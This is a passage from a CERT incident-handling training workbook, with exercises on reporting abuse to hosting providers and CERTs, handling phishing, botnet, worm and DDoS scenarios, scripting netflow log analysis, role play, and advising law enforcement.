Once you find the web page, try to find out what kind of a company you are dealing with. Is it ahosting provider? An ISP? If you find yourself at either of these, you will probably look for an abusedepartment or a network operating centre of some kind and ask them to provide the customersdata or relay your information to him. If you stumble across an online store, or other site whichdoes not seem to provide further network services, you have probably found the customer yourself.Just look for any contact information on the web page.

Last, but not least, consider passing the information on to a local CERT. CERTs have proved to besuccessful in getting to the right people by knowing the local situation, language and culture.Usually they have also built up a tight local network of trusted contacts that you may not be able toreach otherwise. If you are unable to locate the IRT contact in RIPE or APNIC databases, you maywant to use one of the lists of CERT teams:

http://www.first.org/members/teams/index.html members of the Forum of Incident Responseand Security Teams, the global forum for CERTs (sorted alphabetically);

http://www.trusted-introducer.nl/teams/country_LICSA.html a list of recognised EuropeanCERTs, maintained by Trusted Introducer (sorted by country);

http://www.egc-group.org/ European Government CERTs Group; http://enisa.europa.eu/doc/pdf/deliverables/cert_inventory_v1_4.pdf Inventory of CERT

activities in Europe by ENISA; and

http://www.apcert.org/about/structure/members.html members of APCERT, a forum of CERTsfrom the Asia-Pacific region.



41/52


Note the different constituencies of different CERT teams. Although some teams have country-wideresponsibility and will be happy to accept and relay information about malicious activity anywhere intheir country, some are limited to government or military institutions or even single companies oruniversities.

Whenever possible, try to make notes of phone numbers too.

When you have finished gathering contact information, consult with the trainer and other students.

Your next step is to write formal incident reports to the addresses you have found and send them bye-mail. You should start the report by identifying yourself and the company and/or team you areworking for. You may skip this only when you have long-established and informal relationships withthe recipient but do not do so for the sake of this exercise. The report should also contain:

a clear description of the attack and what you think caused it; evidence of the attack log samples including detailed time information, full e-mail with headers,

etc; and a request for actions you should state clearly what you want the recipient to do (eg, stop the

customer from carrying out further abuse, take down an offending host, etc).

Once you have prepared the report, discuss it with the trainer.

If you have PGP/GPG available, always sign your mail. Note that encryption is not necessary unlessyou are sending sensitive information such as a cracked password, strings to access a vulnerablesite, etc. Also, you would need to have a public key for the recipient or agree with him or her on apass-phrase for symmetric encryption beforehand.

After hitting the Send button, you are done with the first session, but not done with your exercise.Ask the teacher for the details of the second session when you will discuss the results. Until then,make sure you monitor your mailbox, reply to any inquiries you may receive from theadministrators if you can, and take notes of any responses, tracking any numbers, etc, you mayreceive.

Session TwoShare your experience from the contacts:

How many e-mails did you send? How many replies did you get? What kinds of replies did you get automated, personalised, asking for clarification, or

confirming resolution? How much time did it usually take to get a reply back? In how many cases do you believe you managed to resolve the incident? In cases where you did not receive any reply, what do you think was the reason?

Discuss your findings and opinions with the other students and the teacher.

In some cases, the teacher might ask you to follow up with a phone call. Do you still have thenumbers you noted?


42/52


Exercise 9Large-scale Incident Handling

EXERCISE TASKS


The purpose of this exercise is to introduce you to the way large-scale incidents can be handled.You will face different scenarios, presented by the trainer. For each scenario, follow carefully whatthe trainer has to say. The trainer will explain a certain initial situation and you will be asked tosuggest ways of moving forward. To help you, the trainer will pose leading questions. Answeringthe questions will move you to the next phase of the scenario, until you arrive at the finalsolution.

PART 1 LARGE-SCALE PHISHING ATTACKThis exercise is meant to be carried out with the help of the trainer. At the beginning, you will begiven a short overview of what phishing is. The trainer will then present a scenario to you. Thescenario will be resolved through a series of steps (tasks).

Source of information

What are your possible sources for obtaining information about phishing incidents?

Task 1

Initial investigation

What would be your first steps in tackling a reported phishing incident?

Task 2

Take down

How would you organise the takedown of the phishing site? What are the possibleobstacles?

Task 3

Warning & Mitigation

How would you go about warning victims? What steps could be taken, other thanorganising a takedown, to mitigate the problem?

Task 4

PART 2 LARGE BOTNET SPREADING THROUGH A NEW VULNERABILITY

You have gained some experience on how to handle large-scale phishing attacks. Now you are facedwith a large botnet which is blasting through your network using some new vulnerability you havenever heard of. The trainer will introduce some more details to you. As in the previous example,you should resolve the incident through the tasks listed below. The trainer will be there to help you,answering your questions so that you may proceed to the next task. Try to enumerate as manypossible variants as you can think of.

Source of information

What are your possible sources for obtaining information about new botnets andvulnerabilities? What services could you use to monitor networks and acquireinformation about network events?

Task 1


43/52


PART 3 INTERNAL WORM OUTBREAK

This scenario deals with a different case from the two previous scenarios. Those involved handlingincidents external to a CERT. But what if an attack is happening in a network of a corporate CERT?

In this scenario, the trainer will:

present you with a hypothetical scenario of a worm entering a corporate network; present a diagram (below) of a hypothetical organisations network; give general information about the initial situation; and guide you in a step-by-step manner, by providing leading questions to help you understand what

is happening and how to resolve the situation.

The network topology looks like the following:

Initial investigation

What would be your first steps in tackling such a situation?

Task 2

Take down

How would you organise the takedown of a controller? What are the possibleobstacles?

Task 3

Warning & Mitigation

How would you go about warning victims? What steps could be taken, other thanorganising a takedown, to mitigate the problem?

Task 4


44/52


Perform the following tasks, enumerating all the possible variants of the problem you can think of.How would you resolve the situation? Again, the trainer will provide you with leading questions.

PART 4 LARGE SCALE DDoS ATTACKS AGAINST THE ENTIRE COUNTRY

This part of the exercise is devoted particularly to developing your skills and ideas on handlinglarge-scale country-wide DDoS attacks. You will learn how to prepare the attack defence strategy,undertake appropriate actions and overcome various types of difficulties at different levels, bothtechnical and organisational.

Your ideas for Phase I

Possible source of attack

Where could the attack have come from?

Task 1

Type of attack

How does the worm spread?

Task 2

Malware capture and analysis

How could you capture and analyse the worm?

Task 3

Worm controller identification

How could you determine if this worm has a controller and adds infected hosts to abotnet?

Task 4

Case study: hypothetical cyber attack against country X

You will receive a case study which describes some hypothetical cyber attack againstcountry X. Your task is to prepare the defence strategy for this cyber attack. Thinkabout the consequences of the situations described and the potential difficulties aCERT could face. Explain the motivation for the actions you propose. You have 45minutes to complete this task. Be prepared to present your ideas to the whole group.

Use the following form to prepare your strategy.

Task 1


45/52

Your ideas for Phase II

Your ideas for Phase III

Present and discuss your ideas with the others.

Defence procedure (You are your CERT)


Another perspective: your country is under cyber attack

Imagine a similar attack occurs against your country or happens to your constituency.What would be your actions? Develop a basic defence procedure for your CSIRT team.

Task 2

Analysis of a particular DDoS method

You will receive a description of a DDoS attack. Your task will be to give ideas aboutthe types of analytical methods and actions which can be used to defend against it.

Task 3

Lesson learnt

Think about how to be better prepared to defend future large-scale attacks? Considerissues connected to prevention, preparedness and sustainability.

Task 4


46/52


Exercise 10Automation in Incident Handling


Sometimes information about an incident, particularly about a widespread incident, is received inbulk containing not just data about your networks but from all networks. This can be the casewhen a site under a DDoS attack shares its logs without time to sort and separate them forindividual ISPs, look for contacts, etc. Having one-to-many distribution channels at hand, such asmailing lists, they can efficiently publish information for everyone to analyse.

On the other hand, sometimes you have plenty of information collected from your own sources

which you wish to share with others, distributing it on a need-to-know basis. An example can belogs from IPS systems, early warning systems, etc. While you observe attacks from all around theworld, you may have a few interested parties who want to receive and handle reports about theirnetworks. In such cases you need to sort the information out.

Can you think of other situations where automation and scripting may help you?

You can find a lot of lightweight useful tools in the standard Linux shell. Some of the mostcommonly used are:

cat concatenate files and print on the standard output head output the first part of files tail output the last part of files grep, egrep print lines matching a pattern sort sort lines of text files cut remove sections from each line of files awk pattern scanning and processing language netcat reads and writes data across network connections

Their documentation is available by typing: man command_name at the command prompt.

For more advanced processing you can use powerful programming languages like python and perlwith lots of ready text-manipulation routines.

The text file 24022007.txt contains netflow logs from a DDoS attack. Although this is a UDP flood tovarious ports and the source hosts are probably spoofed, you may decide to verify whether thistraffic was observed at origin and you happen to have good contacts with CERT teams in Poland andTurkey.

The log file format is as follows (columns separated with whitespaces):

This exercise will let you practice your skills in the fast and automated or semi-automatedanalysing of logs and guide you through some tools than can be useful in these tasks.

Column Description

1 Date

2 Time

3 Duration

4 Protocol

5 Source IP address:port

6 ->

7 Destination IP address:port

8 Number of packets transmitted

9 Number of bytes transmitted

10 Number of aggregated flows


47/52

Use the tools to dig some useful information out of this bulk data.

Hints: sort offers an option to remove repeated lines from output. You can count lines,characters, etc, in a text file with wc.

A detailed description of the service is available at http://www.team-cymru.org/Services/ip-to-asn.html and additional instructions can be obtained with a command:

$ whois -h whois.cymru.com help

Make sure you read the instructions and policies published on the webpage.

Hints: Use bulk query over whois protocol. You will need to enable the display of the countrycodes in the output.


Locating unique interesting hosts

Generate a list of unique attacking IP addresses. How many distinct source hostswere taking part in the attack? (Assume that attacking packets = UDP packets.)

Task 1

Geolocation

Team Cymru (http://www.team-cymru.com/) offers an IP to ASN mapping service.Use this service to find attacking IP addresses assigned to Poland and Turkey.

Task 2

Looking further

While the attack consists of UDP packets to (apparently) random high ports, there aresome other flows that stand out. Can you find them?

Task 3


48/52


Exercise 11Incident Handling in Live Role Playing


EXERCISE TASKS

This is a role-playing game that will take you into the world of incident handling. Doesnt sound likemuch fun? Well, it depends on you, as you will have a lot of freedom in developing the scenario andtaking turns in the actions. Try to be as interactive as possible.

You will receive a small note with a personal description of your character. This is for your eyesonly! If you decide to take some action (eg, call someone), ask the game master for permission. Hehas the power to give or take back any information, fast forward or revert the time, and influenceyour decisions. However, keep in mind that you should not try to speculate on the decisions of otherplayers and vice versa you should not let others decide for you (unless they are your bosses, ofcourse ).

You can exchange information with other characters by meeting them face to face, making calls,sending e-mails, etc. Just describe what you are doing and interact with your partner. Rememberthat you cannot use any information that you heard when other characters talked unless yourcharacter was in the same room; the same rule applies to the other participants.

At the end of the game you will be asked to share your opinions, so keep them for then. You canmake notes on how you would proceed if you knew something in advance or if you were playinganother character, and share them with everyone later.

This exercise is designed to introduce you to many different layers and aspects of incidenthandling, including but not limited to:

interaction with end-users; interaction with administrators; vulnerability handling; and talking to the management.

It should help you to get into other peoples shoes, understand their needs and expectationsduring the incident handling process and improve your communications with different actors.


49/52


50/52

What would you do in cases involving:a) a denial of service attack,b) phishing, andc) cyber defamation?

1. What kind of information should the LEA provide you with?2. How could you identify the source of the crime?

3. What could you advise the LEA to do?

Below are some examples of queries from an LEA: The LEA asks you to establish the owner of an e-mail address. The LEA sends you a letter without the return address. The LEA asks questions without proper authorisation or an appropriate signature. The LEA asks for a list of log entries that could help identify users connecting to the Internet

using a computer with an IP address xxxx.

The LEA asks for the identity of the user who was assigned IP address xxxx during a specificperiod of time a few years ago.

The LEA asks for log entries containing a list of all connections established on a particular day.

Think about proposals for CERT training for an LEA which would decrease the number of suchquestions.


CERT advises an incident reporter in a cyber crime case

Read the following descriptions of three incidents reported to a CERT:

A user reports that he receives e-mails with viruses from one particular address.(The reporter suspects that they are sent on purpose.) The reporter provides thedetails of his mailbox (login and password) with a request for it to be checked withthe CERTs help.

A server administrator at the University reports that its web server (IP given) hasbecame the target of a massive DDoS attack. The number of connections from theattacking hosts exceeded 35,000 in the first days, but on that day, the attacks

were boosted and occurred 4 times a day for 2 to 3.5 hours each time and thenumber of connections (recorded in firewall logs) was more than 130,000. Thetotal number of attacking hosts was probably more than 1,000. They had alreadyblocked about 450 of the attacking networks. In most cases, attacks originatedfrom the network in France, the Netherlands and Germany.

A bank reports that it has been informed that there is a website hosted by somecompany which is involved in a phishing scheme to obtain personal accountinformation from the customers of this bank.

Write separate instructions for the victims of these incidents, including your adviceand an explanation on how to report the incidents to an LEA.

Task 2

CERT advises LEA in a cyber crime case

The trainer asks you what kind of aspects should be addressed in cooperation with anLEA. Then, he or she asks you to think about what a CERT could advise when itreceives a call from an LEA regarding a case of suspected cyber crime.

Task 3

CERT prepares training for LEA

The trainer asks you to think about proposals for CERT training for an LEA. What kindof training will it be? What kind of advice should this training contain?

Task 4


51/52


52/52

cert exercise toolset

Documents